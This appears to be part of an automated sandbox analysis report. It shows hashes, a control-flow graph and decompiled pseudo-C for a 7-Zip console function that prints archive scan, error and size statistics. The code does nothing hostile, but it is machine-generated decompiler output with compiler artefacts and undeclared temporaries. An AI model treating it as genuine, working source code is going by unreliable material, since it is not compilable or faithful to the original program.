                                                                                                                    Similarity
                                                                                                                    • API ID: Find$FileFirst$CloseH_prolog
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3371352514-0
                                                                                                                    • Opcode ID: fbeab14e05253974cba32d2758964c077c9977d521ed672afe3501c19ae84909
                                                                                                                    • Instruction ID: fd7803887bd69e01a6418ccd971fea1047cc5cada58972dc85ab9ee1dd6f90f5
                                                                                                                    • Opcode Fuzzy Hash: fbeab14e05253974cba32d2758964c077c9977d521ed672afe3501c19ae84909
                                                                                                                    • Instruction Fuzzy Hash: AE11603180020A9FCB20EF64D8956FDB7F9EF54321FA046A9E951672A1DB718EC6DB40
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B48E42 Relevance: 56.7, APIs: 15, Strings: 17, Instructions: 690COMMON
                                                                                                                    Download Yara Rule

                                                                                                                    Control-flow Graph

                                                                                                                    • Executed
                                                                                                                    • Not Executed
                                                                                                                    control_flow_graph 0 b48e42-b48e49 1 b48e4f-b48e5c call b207ce 0->1 2 b491a9-b49373 call b56b33 call b11524 call b56b33 call b11524 call b11e55 0->2 7 b48e62-b48e69 1->7 8 b4905d-b49064 1->8 63 b49375-b4937e call b49f2e 2->63 64 b49380 2->64 12 b48e83-b48eb8 call b48102 7->12 13 b48e6b-b48e71 7->13 10 b49196-b491a4 call b4a393 8->10 11 b4906a-b4907c call b4a32a 8->11 25 b49a52-b49a59 10->25 26 b4907e-b49082 11->26 27 b49088-b4912a call b36cb9 call b127b7 call b126d9 call b32b6f call b49bc8 call b127b7 11->27 29 b48ec8 12->29 30 b48eba-b48ec0 12->30 13->12 17 b48e73-b48e7e call b13076 13->17 17->12 32 b49a69-b49a95 call b4a7a1 call b11e89 call b32046 25->32 33 b49a5b-b49a62 25->33 26->27 94 b49132-b49191 call b4a4df call b41b84 call b11e89 * 2 call b4ae2c 27->94 95 b4912c 27->95 34 b48ecc-b48f0d call b12f78 call b4a19d 29->34 30->29 31 b48ec2-b48ec6 30->31 31->34 70 b49a97-b49a99 32->70 71 b49a9d-b49ae4 call b11e89 call b111c2 call b4ac40 call b41b84 32->71 33->32 37 b49a64 call b4a7bc 33->37 55 b48f0f-b48f13 34->55 56 b48f19-b48f29 34->56 37->32 55->56 61 b48f3c 56->61 62 b48f2b-b48f31 56->62 72 b48f43-b48fe0 call b12f78 call b36cb9 call b49bc8 call b3e6a7 61->72 62->61 68 b48f33-b48f3a 62->68 67 b49382-b4938b 63->67 64->67 75 b49393-b493f0 call b12f78 call b4a0ab 67->75 76 b4938d-b4938f 67->76 68->72 70->71 109 b48fe2-b48fea call b4b618 72->109 110 b48fef-b48ff8 72->110 98 b493f2-b493f6 75->98 99 b493fc-b49481 call b49b35 call b4ad72 call b22722 call b12d90 call b3315c 75->99 76->75 94->25 95->94 98->99 137 b494a5-b49505 call b30e95 99->137 138 b49483-b494a0 call b3255b call b4a7a1 99->138 109->110 115 b49000-b49053 call b4a4df call b41b84 call b11e89 call b4add8 call b4823a 110->115 116 b48ffa 110->116 145 b49058 115->145 116->115 147 b49507-b4950c call b4b618 137->147 148 b49511-b49514 137->148 138->137 145->25 147->148 150 b49516-b4951d 148->150 151 b4955d-b49569 148->151 154 b49551-b49554 150->154 155 b4951f-b4954c call b11fe9 fputs call b11fe9 call b11ffc call b11fe9 150->155 152 b495cd-b495d9 151->152 153 b4956b-b49579 call b11fe9 151->153 156 b49608-b49614 152->156 157 b495db-b495e1 152->157 167 b49584-b495c8 fputs call b1224a call b11fe9 fputs call b1224a call b11fe9 153->167 168 b4957b-b49582 153->168 154->151 158 b49556 154->158 155->154 163 b49616-b4961c 156->163 164 b49647-b49649 156->164 157->156 161 b495e3-b49603 fputs call b1224a call b11fe9 157->161 158->151 161->156 169 b49622-b49642 fputs call b1224a call b11fe9 163->169 170 b496c8-b496d4 163->170 164->170 172 b4964b-b4965a 164->172 167->152 168->152 168->167 169->164 178 b496d6-b496dc 170->178 179 b49718-b4971c 170->179 173 b49680-b4968c 172->173 174 b4965c-b4967b fputs call b1224a call b11fe9 172->174 173->170 183 b4968e-b496a1 call b11fe9 173->183 174->173 185 b4971e 178->185 189 b496de-b496f1 call b11fe9 178->189 184 b49725-b49727 179->184 179->185 183->170 208 b496a3-b496c3 fputs call b1224a call b11fe9 183->208 193 b4972d-b49739 184->193 194 b498de-b4991a call b331ca call b11e89 call b4af38 call b49bb1 184->194 185->184 189->185 206 b496f3-b49713 fputs call b1224a call b11fe9 189->206 203 b498a2-b498b8 call b11fe9 193->203 204 b4973f-b4974e 193->204 248 b49920-b49926 194->248 249 b49a3a-b49a4d call b41b84 * 2 194->249 203->194 222 b498ba-b498d7 fputs call b1224a 203->222 204->203 210 b49754-b49758 204->210 206->179 208->170 210->194 217 b4975e-b4976c 210->217 223 b4976e-b49793 fputs call b1224a call b11fe9 217->223 224 b49799-b497a0 217->224 222->194 240 b498d9 call b11fe9 222->240 223->224 225 b497a2-b497a9 224->225 226 b497be-b497d7 fputs call b1224a 224->226 225->226 232 b497ab-b497b1 225->232 238 b497dc-b497ec call b11fe9 226->238 232->226 237 b497b3-b497bc 232->237 237->226 243 b49835-b4987a fputs call b1224a call b11fe9 fputs call b1224a 237->243 238->243 251 b497ee-b49830 fputs call b1224a call b11fe9 fputs call b1224a call b11fe9 238->251 240->194 262 b4987f-b4988a call b11fe9 243->262 248->249 249->25 251->243 262->194 269 b4988c-b498a0 call b11fe9 call b45f3d 262->269 269->194
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00B48E42(struct _IO_FILE** __ebx, intOrPtr __edi) {
				struct _IO_FILE** _t384;
				void* _t386;
				signed int _t387;
				intOrPtr* _t395;
				intOrPtr _t400;
				signed int _t411;
				signed int _t420;
				signed int _t424;
				signed int _t432;
				signed int _t444;
				void* _t460;
				void* _t465;
				signed int _t466;
				void* _t468;
				struct _IO_FILE** _t473;
				void* _t477;
				void* _t499;
				signed int _t526;
				signed int _t539;
				signed int _t569;
				signed int _t578;
				struct _IO_FILE** _t580;
				signed int _t581;
				signed int _t602;
				struct _IO_FILE** _t614;
				signed int _t778;
				signed int _t791;
				void* _t807;
				intOrPtr _t816;
				struct _IO_FILE** _t819;
				struct _IO_FILE** _t820;
				signed int _t823;
				signed int _t825;
				signed int _t826;
				signed int _t827;
				void* _t828;

				_t816 = __edi;
				_t614 = __ebx;
				if( *((intOrPtr*)(_t828 - 0x2f8)) == 6) {
					 *((intOrPtr*)(_t828 - 0x78)) = 0;
					 *((intOrPtr*)(_t828 - 0x74)) = 0;
					 *((intOrPtr*)(_t828 - 0x70)) = 0;
					 *((intOrPtr*)(_t828 - 0x38)) = 0;
					 *((intOrPtr*)(_t828 - 0x34)) = 0;
					 *((intOrPtr*)(_t828 - 0x30)) = 0;
					__eflags =  *((char*)(_t828 - 0x33a));
					_t614 = fputs;
					 *(_t828 - 4) = 0xc;
					if(__eflags == 0) {
						_push(0xc8);
						E00B48163(_t828 - 0x43c, __eflags);
						 *((intOrPtr*)(_t828 - 0x44c)) = 0xb8e058;
						_t384 =  *0xb9a894;
						asm("sbb ecx, ecx");
						 *(_t828 - 4) = 0xd;
						 *(_t828 - 0x448) =  ~( *(_t828 - 0x338)) & _t384;
						 *(_t828 - 0x444) =  *0xb9a898;
						 *(_t828 - 0x398) =  *(_t828 - 0x18);
						__eflags = _t384;
						 *((intOrPtr*)(_t828 - 0x390)) =  *(_t828 - 0x14) - 1;
						if(_t384 != 0) {
							__eflags =  *(_t828 - 0x338);
							if( *(_t828 - 0x338) != 0) {
								fputs("Scanning the drive for archives:",  *_t384); // executed
								E00B11FE9(_t384);
							}
						}
						 *((intOrPtr*)(_t828 - 0xac)) = 0;
						 *((intOrPtr*)(_t828 - 0xa8)) = 0;
						 *((intOrPtr*)(_t828 - 0xa4)) = 0;
						 *((intOrPtr*)(_t828 - 0xa0)) = 0;
						 *((intOrPtr*)(_t828 - 0x9c)) = 0;
						 *((intOrPtr*)(_t828 - 0x98)) = 0;
						 *(_t828 - 0x94) = 0;
						 *(_t828 - 0x90) = 0;
						 *((intOrPtr*)(_t828 - 0x8c)) = 0;
						 *(_t828 - 0x88) = 0;
						 *(_t828 - 0x84) = 0;
						 *(_t828 - 0x80) = 0;
						E00B44249(_t828 - 0x44c);
						_t386 = E00B12D90(_t828 - 0x60);
						_push(_t828 - 0x44c);
						_push(_t828 - 0xac);
						_push(_t828 - 0x38);
						_push(_t828 - 0x78);
						_push(_t386);
						 *(_t828 - 4) = 0xe;
						_t387 = E00B30621(_t614, _t828 - 0x2cc, 0, 0, __eflags); // executed
						 *(_t828 - 0x20) = _t387;
						 *(_t828 - 4) = 0xd;
						E00B11E89(_t387,  *((intOrPtr*)(_t828 - 0x60)));
						__eflags =  *(_t828 - 0x398);
						if( *(_t828 - 0x398) != 0) {
							E00B4B618(_t828 - 0x43c, 0, 1); // executed
						}
						__eflags =  *(_t828 - 0x20);
						if( *(_t828 - 0x20) == 0) {
							__eflags =  *(_t828 - 0x338);
							if( *(_t828 - 0x338) != 0) {
								_push(_t828 - 0xac); // executed
								E00B445E7(_t828 - 0x44c); // executed
							}
						}
						 *(_t828 - 4) = 0xc;
						L00B4B57F(_t828 - 0x43c);
						__eflags =  *(_t828 - 0x20);
						if( *(_t828 - 0x20) != 0) {
							L104:
							 *(_t828 - 4) = 0xb;
							L00B41B84(_t614, _t828 - 0x38);
							 *(_t828 - 4) = 8;
							L00B41B84(_t614, _t828 - 0x78);
							L105:
							if( *((char*)(_t828 - 0x334)) != 0 &&  *0xb9a894 != 0) {
								E00B4A7BC();
							}
							E00B11E89(E00B4A7A1( *(_t828 - 0x20)),  *((intOrPtr*)(_t828 - 0xcc)));
							 *(_t828 - 4) = 6;
							E00B32046(_t828 - 0xc0);
							_t395 =  *((intOrPtr*)(_t828 - 0x2c));
							 *(_t828 - 4) = 4;
							_t845 = _t395;
							if(_t395 != 0) {
								_t395 =  *((intOrPtr*)( *_t395 + 8))(_t395);
							}
							 *(_t828 - 4) = 2;
							E00B11E89(_t395,  *((intOrPtr*)(_t828 - 0xdc)));
							L00B111C2(_t828 - 0x108);
							 *(_t828 - 4) =  *(_t828 - 4) & 0x00000000;
							E00B4AC40(_t614, _t828 - 0x340, _t845);
							 *(_t828 - 4) =  *(_t828 - 4) | 0xffffffff;
							L00B41B84(_t614, _t828 - 0x6c);
							_t400 =  *((intOrPtr*)(_t828 - 0x28));
							 *[fs:0x0] =  *((intOrPtr*)(_t828 - 0xc));
							return _t400;
						} else {
							L38:
							__eflags =  *(_t828 - 0xd);
							if(__eflags == 0) {
								_push(_t828 - 0x5c);
								_push(_t828 - 0x50);
								_push(_t828 - 0x2a4);
								 *(_t828 - 0x24) =  *((intOrPtr*)(_t828 - 0x308));
								_push(_t828 - 0x2e4);
								 *((char*)(_t828 - 0x23)) =  *((intOrPtr*)(_t828 - 0x307));
								_push(_t828 - 0x2e8);
								 *(_t828 - 0x50) = 0;
								_push( *((intOrPtr*)(_t828 - 0x335)));
								 *(_t828 - 0x4c) = 0;
								 *(_t828 - 0x5c) = 0;
								 *(_t828 - 0x58) = 0;
								_push( *(_t828 - 0x338));
								_push( *((intOrPtr*)( *((intOrPtr*)(_t828 - 0x314)))) + 0xc);
								_push( *((intOrPtr*)(_t828 - 0x331)));
								_push( *((intOrPtr*)(_t828 - 0x270)));
								_push(_t828 - 0x38);
								_push(_t828 - 0x78);
								_push( *((intOrPtr*)(_t828 - 0x33a)));
								_push(_t828 - 0xcc);
								_push(_t828 - 0xc0);
								_t411 = L00B4752C(_t828 - 0x24,  *((intOrPtr*)(_t828 - 0x2c)), __eflags);
								__eflags =  *(_t828 - 0x338);
								 *(_t828 - 0x20) = _t411;
								if( *(_t828 - 0x338) == 0) {
									L99:
									__eflags =  *(_t828 - 0x4c);
									if( *(_t828 - 0x4c) > 0) {
										L101:
										__eflags =  *(_t828 - 0x338);
										if( *(_t828 - 0x338) != 0) {
											E00B11FE9(0xb9a5b0);
											 *_t614("Errors: ",  *0xb9a5b0);
											E00B11FE9(E00B1224A(0xb9a5b0,  *(_t828 - 0x50),  *(_t828 - 0x4c)));
										}
										 *((intOrPtr*)(_t828 - 0x28)) = 2;
										goto L104;
									}
									__eflags =  *(_t828 - 0x50);
									if( *(_t828 - 0x50) <= 0) {
										goto L104;
									}
									goto L101;
								}
								__eflags =  *(_t828 - 0x58);
								if( *(_t828 - 0x58) > 0) {
									L98:
									E00B11FE9(0xb9a5b0);
									 *_t614("Warnings: ",  *0xb9a5b0);
									E00B11FE9(E00B1224A(0xb9a5b0,  *(_t828 - 0x5c),  *(_t828 - 0x58)));
									goto L99;
								}
								__eflags =  *(_t828 - 0x5c);
								if( *(_t828 - 0x5c) <= 0) {
									goto L99;
								}
								goto L98;
							}
							_push(0x170);
							_t420 = E00B11E55();
							 *(_t828 - 0x58) = _t420;
							__eflags = _t420;
							 *(_t828 - 4) = 0xf;
							if(__eflags == 0) {
								_t823 = 0;
								__eflags = 0;
							} else {
								_t823 = L00B49F2E(_t420, __eflags);
							}
							__eflags = _t823;
							 *(_t828 - 4) = 0xc;
							 *(_t828 - 0x58) = _t823;
							if(_t823 != 0) {
								 *((intOrPtr*)( *_t823 + 4))(_t823);
							}
							_t174 = _t823 + 0xdc; // 0xdc
							 *((char*)(_t823 + 0xda)) =  *((intOrPtr*)(_t828 - 0x2e8));
							 *(_t828 - 4) = 0x10;
							L00B12F78(_t174, _t828 - 0x2e4);
							_t424 = E00B4A0AB(_t823,  *0xb9a894,  *0xb9a898,  *(_t828 - 0x18));
							__eflags =  *((intOrPtr*)(_t828 - 0x74)) - 1;
							__eflags =  *(_t828 - 0x18);
							 *((char*)(_t823 + 0xd9)) = _t424 & 0xffffff00 |  *((intOrPtr*)(_t828 - 0x74)) - 0x00000001 > 0x00000000;
							 *((intOrPtr*)(_t823 + 0x168)) =  *((intOrPtr*)(_t828 - 0x114));
							 *(_t823 + 0x164) =  *(_t828 - 0x1c);
							if(__eflags != 0) {
								_t539 =  *(_t828 - 0x14) - 1;
								__eflags = _t539;
								 *(_t823 + 0xc4) = _t539;
							}
							L00B49B35(_t828 - 0x38c, __eflags);
							_push(_t828 - 0x298);
							 *(_t828 - 4) = 0x11;
							E00B4AD72(_t828 - 0x38c);
							__eflags =  *((intOrPtr*)(_t828 - 0x2f8)) - 3;
							 *((char*)(_t828 - 0x350)) =  *((intOrPtr*)(_t828 - 0x33a));
							_t432 =  *((intOrPtr*)(_t828 - 0x337));
							 *(_t828 - 0x34e) = _t432;
							 *(_t828 - 0x34f) = _t432;
							 *((char*)(_t828 - 0x34d)) = _t432 & 0xffffff00 |  *((intOrPtr*)(_t828 - 0x2f8)) == 0x00000003;
							E00B22722(_t828 - 0x34c, _t828 - 0x2a4);
							E00B12D90(_t828 - 0x54);
							 *(_t828 - 4) = 0x12;
							L00B3315C(_t828 - 0x3ec);
							__eflags =  *(_t828 - 0x2d4);
							 *(_t828 - 4) = 0x13;
							 *(_t828 - 0x1c) = 0;
							if( *(_t828 - 0x2d4) != 0) {
								 *(_t828 - 0x1c) = _t828 - 0x3ec;
								_push(_t828 - 0x2d8);
								E00B4A7A1(E00B3255B(_t828 - 0x3ec));
							}
							_push(_t828 - 0xb4);
							_push(_t828 - 0x54);
							_push( *(_t828 - 0x1c));
							_t219 = _t823 + 4; // 0x4
							asm("sbb ecx, ecx");
							_push(_t823);
							_push( ~_t823 & _t219);
							asm("sbb edx, edx");
							_t220 = _t823 + 0x10; // 0x10
							_push( ~_t823 & _t220);
							_push(_t828 - 0x38c);
							_push( *((intOrPtr*)( *((intOrPtr*)(_t828 - 0x314)))) + 0xc);
							_push(_t828 - 0x38);
							_push(_t828 - 0x78);
							_push(_t828 - 0xcc);
							_t444 = E00B30E95( *((intOrPtr*)(_t828 - 0x2c)), _t828 - 0xc0); // executed
							__eflags =  *(_t823 + 0xbc);
							 *(_t828 - 0x20) = _t444;
							if( *(_t823 + 0xbc) != 0) {
								_t229 = _t823 + 0x18; // 0x18
								E00B4B618(_t229, 0, 1);
							}
							__eflags =  *(_t828 - 0x50);
							if( *(_t828 - 0x50) != 0) {
								_t526 =  *0xb9a898; // 0xb9a5a0
								__eflags = _t526;
								if(__eflags != 0) {
									 *(_t828 - 0x14) = _t526;
									E00B11FE9(_t526);
									fputs("ERROR:",  *( *(_t828 - 0x14)));
									E00B11FE9( *(_t828 - 0x14));
									_push( *((intOrPtr*)(_t828 - 0x54)));
									E00B11FE9(L00B11FFC( *(_t828 - 0x14), __eflags));
								}
								__eflags =  *(_t828 - 0x20);
								if( *(_t828 - 0x20) == 0) {
									 *(_t828 - 0x20) = 0x80004005;
								}
							}
							_t819 =  *0xb9a894; // 0xb9a5b0
							 *(_t828 - 0xd) =  *(_t828 - 0xd) & 0x00000000;
							__eflags = _t819;
							if(_t819 == 0) {
								L59:
								__eflags =  *(_t823 + 0x128) |  *(_t823 + 0x12c);
								if(( *(_t823 + 0x128) |  *(_t823 + 0x12c)) != 0) {
									__eflags = _t819;
									 *(_t828 - 0xd) = 1;
									if(_t819 != 0) {
										fputs("Can\'t open as archive: ",  *_t819);
										E00B11FE9(E00B1224A(_t819,  *(_t823 + 0x128),  *(_t823 + 0x12c)));
									}
								}
								__eflags =  *(_t823 + 0x130) |  *(_t823 + 0x134);
								if(( *(_t823 + 0x130) |  *(_t823 + 0x134)) == 0) {
									L65:
									__eflags = _t819;
									if(_t819 != 0) {
										_t257 = _t823 + 0x138; // 0x138
										_t499 = _t257;
										__eflags =  *(_t823 + 0x138) |  *(_t499 + 4);
										if(( *(_t823 + 0x138) |  *(_t499 + 4)) != 0) {
											fputs("Archives with Warnings: ",  *_t819);
											_t259 = _t823 + 0x138; // 0x138
											E00B11FE9(E00B1224A(_t819,  *_t259,  *((intOrPtr*)(_t259 + 4))));
										}
										__eflags =  *(_t823 + 0x148) |  *(_t823 + 0x14c);
										if(( *(_t823 + 0x148) |  *(_t823 + 0x14c)) != 0) {
											E00B11FE9(_t819);
											__eflags =  *(_t823 + 0x148) |  *(_t823 + 0x14c);
											if(( *(_t823 + 0x148) |  *(_t823 + 0x14c)) != 0) {
												fputs("Warnings: ",  *_t819);
												E00B11FE9(E00B1224A(_t819,  *(_t823 + 0x148),  *(_t823 + 0x14c)));
											}
										}
									}
									goto L71;
								} else {
									__eflags = _t819;
									 *(_t828 - 0xd) = 1;
									if(_t819 == 0) {
										L71:
										__eflags =  *(_t823 + 0x140) |  *(_t823 + 0x144);
										if(( *(_t823 + 0x140) |  *(_t823 + 0x144)) == 0) {
											L75:
											__eflags =  *(_t828 - 0xd);
											if( *(_t828 - 0xd) == 0) {
												L77:
												__eflags = _t819;
												if(_t819 == 0) {
													L93:
													 *(_t828 - 4) = 0x12;
													E00B11E89(L00B331CA(_t828 - 0x3ec),  *((intOrPtr*)(_t828 - 0x54)));
													 *(_t828 - 4) = 0x14;
													L00B4AF38(_t828 - 0x34c);
													 *(_t828 - 4) = 0x10;
													L00B49BB1(_t828 - 0x38c);
													__eflags = _t823;
													 *(_t828 - 4) = 0xc;
													if(_t823 != 0) {
														 *((intOrPtr*)( *_t823 + 8))(_t823);
													}
													goto L104;
												}
												__eflags =  *(_t823 + 0x130) |  *(_t823 + 0x134);
												if(( *(_t823 + 0x130) |  *(_t823 + 0x134)) != 0) {
													L91:
													E00B11FE9(_t819);
													_t310 = _t823 + 0x150; // 0x150
													_t460 = _t310;
													__eflags =  *(_t823 + 0x150) |  *(_t460 + 4);
													if(( *(_t823 + 0x150) |  *(_t460 + 4)) != 0) {
														fputs("Sub items Errors: ",  *_t819);
														_t312 = _t823 + 0x150; // 0x150
														E00B11FE9(E00B1224A(_t819,  *_t312,  *((intOrPtr*)(_t312 + 4))));
													}
													goto L93;
												}
												_t279 = _t823 + 0x150; // 0x150
												_t465 = _t279;
												__eflags =  *(_t823 + 0x150) |  *(_t465 + 4);
												if(( *(_t823 + 0x150) |  *(_t465 + 4)) != 0) {
													goto L91;
												}
												__eflags =  *(_t828 - 0x20);
												if( *(_t828 - 0x20) != 0) {
													goto L93;
												}
												_t466 =  *(_t828 - 0x94);
												__eflags = _t466 |  *(_t828 - 0x90);
												if((_t466 |  *(_t828 - 0x90)) != 0) {
													fputs("Folders: ",  *_t819);
													E00B11FE9(E00B1224A(_t819,  *(_t828 - 0x94),  *(_t828 - 0x90)));
													_t466 =  *(_t828 - 0x94);
												}
												__eflags =  *((intOrPtr*)(_t828 - 0x8c)) - 1;
												if( *((intOrPtr*)(_t828 - 0x8c)) != 1) {
													L87:
													fputs("Files: ",  *_t819); // executed
													_t468 = E00B1224A(_t819,  *((intOrPtr*)(_t828 - 0x8c)),  *(_t828 - 0x88)); // executed
													E00B11FE9(_t468);
													__eflags =  *(_t828 - 0x84) |  *(_t828 - 0x80);
													if(( *(_t828 - 0x84) |  *(_t828 - 0x80)) != 0) {
														fputs("Alternate Streams: ",  *_t819);
														E00B11FE9(E00B1224A(_t819,  *(_t828 - 0x84),  *(_t828 - 0x80)));
														fputs("Alternate Streams Size: ",  *_t819);
														E00B11FE9(E00B1224A(_t819,  *((intOrPtr*)(_t828 - 0xa4)),  *((intOrPtr*)(_t828 - 0xa0))));
													}
													goto L89;
												} else {
													__eflags =  *(_t828 - 0x88);
													if( *(_t828 - 0x88) != 0) {
														goto L87;
													}
													__eflags = _t466 |  *(_t828 - 0x90);
													if((_t466 |  *(_t828 - 0x90)) != 0) {
														goto L87;
													}
													__eflags =  *(_t828 - 0x84) |  *(_t828 - 0x80);
													if(( *(_t828 - 0x84) |  *(_t828 - 0x80)) == 0) {
														L89:
														fputs("Size:       ",  *_t819); // executed
														_t473 = E00B1224A(_t819,  *((intOrPtr*)(_t828 - 0xac)),  *((intOrPtr*)(_t828 - 0xa8))); // executed
														 *(_t828 - 0x24) = _t473;
														E00B11FE9(_t473);
														fputs("Compressed: ",  *( *(_t828 - 0x24))); // executed
														_t477 = E00B1224A( *(_t828 - 0x24),  *((intOrPtr*)(_t828 - 0x9c)),  *((intOrPtr*)(_t828 - 0x98))); // executed
														E00B11FE9(_t477);
														__eflags =  *(_t828 - 0x1c);
														if( *(_t828 - 0x1c) != 0) {
															E00B11FE9(_t819);
															L00B45F3D(_t819, _t828 - 0x3ec);
														}
														goto L93;
													}
													goto L87;
												}
											}
											L76:
											 *((intOrPtr*)(_t828 - 0x28)) = 2;
											goto L77;
										}
										__eflags = _t819;
										 *(_t828 - 0xd) = 1;
										if(_t819 == 0) {
											goto L76;
										}
										E00B11FE9(_t819);
										__eflags =  *(_t823 + 0x140) |  *(_t823 + 0x144);
										if(( *(_t823 + 0x140) |  *(_t823 + 0x144)) == 0) {
											goto L76;
										}
										fputs("Open Errors: ",  *_t819);
										E00B11FE9(E00B1224A(_t819,  *(_t823 + 0x140),  *(_t823 + 0x144)));
										goto L75;
									}
									fputs("Archives with Errors: ",  *_t819);
									E00B11FE9(E00B1224A(_t819,  *(_t823 + 0x130),  *(_t823 + 0x134)));
									goto L65;
								}
							} else {
								E00B11FE9(_t819);
								__eflags =  *(_t823 + 0x114);
								if( *(_t823 + 0x114) > 0) {
									L58:
									fputs("Archives: ",  *_t819);
									_t242 = _t823 + 0x110; // 0x110
									E00B11FE9(E00B1224A(_t819,  *_t242,  *((intOrPtr*)(_t242 + 4))));
									fputs("OK archives: ",  *_t819);
									E00B11FE9(E00B1224A(_t819,  *((intOrPtr*)(_t823 + 0x120)),  *((intOrPtr*)(_t823 + 0x124))));
									goto L59;
								}
								__eflags =  *((intOrPtr*)(_t823 + 0x110)) - 1;
								if( *((intOrPtr*)(_t823 + 0x110)) <= 1) {
									goto L59;
								}
								goto L58;
							}
						}
					}
					E00B56B33(_t828 - 0x78);
					_push(_t828 - 0x2b0);
					E00B11524(_t828 - 0x78);
					E00B56B33(_t828 - 0x38);
					_push(_t828 - 0x2b0);
					E00B11524(_t828 - 0x38);
					goto L38;
				}
				if(E00B207CE(_t828 - 0x2f8) == 0) {
					__eflags =  *((intOrPtr*)(_t828 - 0x2f8)) - 9;
					if(__eflags != 0) {
						_t807 = 7;
						E00B4A393(_t807);
						goto L105;
					}
					E00B4A32A(_t828 - 0x5ac, __eflags);
					__eflags =  *(_t828 - 0x18) - __ebx;
					 *(_t828 - 4) = 0x19;
					if( *(_t828 - 0x18) != __ebx) {
						_t578 =  *(_t828 - 0x14) - 1;
						__eflags = _t578;
						 *(_t828 - 0x4f8) = _t578;
					}
					_t825 =  *0xb9a898; // 0xb9a5a0
					_t820 =  *0xb9a894; // 0xb9a5b0
					E00B36CB9(_t828 - 0x4c8);
					 *(_t828 - 0x500) =  *(_t828 - 0x18);
					 *((char*)(_t828 - 0x473)) =  *(_t828 - 0x338);
					 *(_t828 - 0x4b8) = _t614;
					 *(_t828 - 0x4f4) = _t820;
					 *(_t828 - 0x4f0) = _t825;
					E00B127B7(_t828 - 0x470, _t828 - 0x324);
					E00B126D9(_t828 - 0x38);
					_push(_t828 - 0x5ac);
					_push(_t828 - 0x38);
					 *(_t828 - 4) = 0x1a;
					 *(_t828 - 0x20) = E00B32B6F(_t828 - 0x314, _t828 - 0x150, __eflags);
					L00B49BC8(_t828 - 0x98, __eflags);
					 *(_t828 - 4) = 0x1b;
					E00B127B7(_t828 - 0x94, _t828 - 0x38);
					_t569 =  *0xb9a894; // 0xb9a5b0
					_t778 = _t569;
					__eflags = _t778 - _t614;
					if(_t778 == _t614) {
						_t778 =  *0xb9a898; // 0xb9a5a0
					}
					_push( *(_t828 - 0x338));
					_push(_t778);
					_push(_t569);
					_push(_t828 - 0x98);
					asm("sbb edx, edx");
					 *((intOrPtr*)(_t828 - 0x28)) = E00B4A4DF( *(_t828 - 0x20),  ~(_t828 - 0x5ac) & _t828 - 0x000005a4);
					 *(_t828 - 4) = 0x1c;
					E00B11E89(E00B11E89(L00B41B84(_t614, _t828 - 0x88),  *(_t828 - 0x94)),  *((intOrPtr*)(_t828 - 0x38)));
					 *(_t828 - 4) = 8;
					E00B4AE2C(_t614, _t828 - 0x5ac);
					goto L105;
				} else {
					if( *((char*)(_t828 - 0x257)) != 0) {
						_t834 =  *((intOrPtr*)(_t828 - 0x198)) - __ebx;
						if( *((intOrPtr*)(_t828 - 0x198)) == __ebx) {
							L00B13076(_t828 - 0x19c, "7zCon.sfx");
						}
					}
					E00B48102(_t828 - 0x464, _t834);
					_t580 =  *0xb9a894; // 0xb9a5b0
					_t826 =  *(_t828 - 0x18);
					 *(_t828 - 0x3ac) = _t580;
					_t581 =  *0xb9a898; // 0xb9a5a0
					 *(_t828 - 4) = 0x15;
					 *(_t828 - 0x3a8) = _t581;
					 *(_t828 - 0x3b8) = _t826;
					if( *((char*)(_t828 - 0x2e8)) == 0) {
						L8:
						_t15 = _t828 - 0xd;
						 *_t15 =  *(_t828 - 0xd) & 0x00000000;
						__eflags =  *_t15;
						L9:
						 *((char*)(_t828 - 0x39a)) =  *(_t828 - 0xd);
						L00B12F78(_t828 - 0x398, _t828 - 0x2e4);
						E00B4A19D(_t828 - 0x594, _t836);
						 *((intOrPtr*)(_t828 - 0x4cc)) =  *((intOrPtr*)(_t828 - 0x114));
						 *(_t828 - 4) = 0x16;
						 *(_t828 - 0x4d0) =  *(_t828 - 0x1c);
						if(_t826 != _t614) {
							 *((intOrPtr*)(_t828 - 0x4e0)) =  *(_t828 - 0x14) - 1;
						}
						 *((char*)(_t828 - 0x473)) =  *(_t828 - 0xd);
						if( *((char*)(_t828 - 0x2e8)) == 0) {
							L14:
							_t34 = _t828 - 0x472;
							 *_t34 =  *(_t828 - 0x472) & 0x00000000;
							__eflags =  *_t34;
							L15:
							L00B12F78(_t828 - 0x470, _t828 - 0x2e4);
							_t827 =  *0xb9a898; // 0xb9a5a0
							_t614 =  *0xb9a894; // 0xb9a5b0
							 *((char*)(_t828 - 0x4d4)) =  *((intOrPtr*)(_t828 - 0x252));
							E00B36CB9(_t828 - 0x4b0);
							 *(_t828 - 0x4a0) =  *(_t828 - 0x4a0) & 0x00000000;
							 *(_t828 - 0x4dc) = _t614;
							 *(_t828 - 0x4d8) = _t827;
							 *(_t828 - 0x4e8) =  *(_t828 - 0x18);
							L00B49BC8(_t828 - 0x48, _t840);
							 *(_t828 - 4) = 0x17;
							 *(_t828 - 0x20) = E00B3E6A7(_t816, _t828 - 0xc0, _t828 - 0x2f4, _t828 - 0x314, _t828 - 0x258, _t828 - 0x48, _t828 - 0x464, _t828 - 0x594, 1);
							if( *(_t828 - 0x4e8) != 0) {
								E00B4B618(_t828 - 0x58c, _t816, 1);
							}
							_t602 =  *0xb9a894; // 0xb9a5b0
							_t791 = _t602;
							if(_t791 == 0) {
								_t791 =  *0xb9a898; // 0xb9a5a0
							}
							_push(1);
							_push(_t791);
							_push(_t602);
							_push(_t828 - 0x48);
							asm("sbb edx, edx");
							 *((intOrPtr*)(_t828 - 0x28)) = E00B4A4DF( *(_t828 - 0x20),  ~(_t828 - 0x594) & _t828 - 0x0000058c);
							 *(_t828 - 4) = 0x18;
							E00B11E89(L00B41B84(_t614, _t828 - 0x38),  *((intOrPtr*)(_t828 - 0x44)));
							 *(_t828 - 4) = 0x15;
							E00B4ADD8(_t614, _t828 - 0x594);
							 *(_t828 - 4) = 8;
							E00B4823A(_t828 - 0x464);
							goto L105;
						}
						_t840 =  *((intOrPtr*)(_t828 - 0x2e0)) - _t614;
						if( *((intOrPtr*)(_t828 - 0x2e0)) != _t614) {
							goto L14;
						} else {
							 *(_t828 - 0x472) = 1;
							goto L15;
						}
					}
					_t836 =  *((intOrPtr*)(_t828 - 0x2e0)) - _t614;
					if( *((intOrPtr*)(_t828 - 0x2e0)) == _t614) {
						goto L8;
					} else {
						 *(_t828 - 0xd) = 1;
						goto L9;
					}
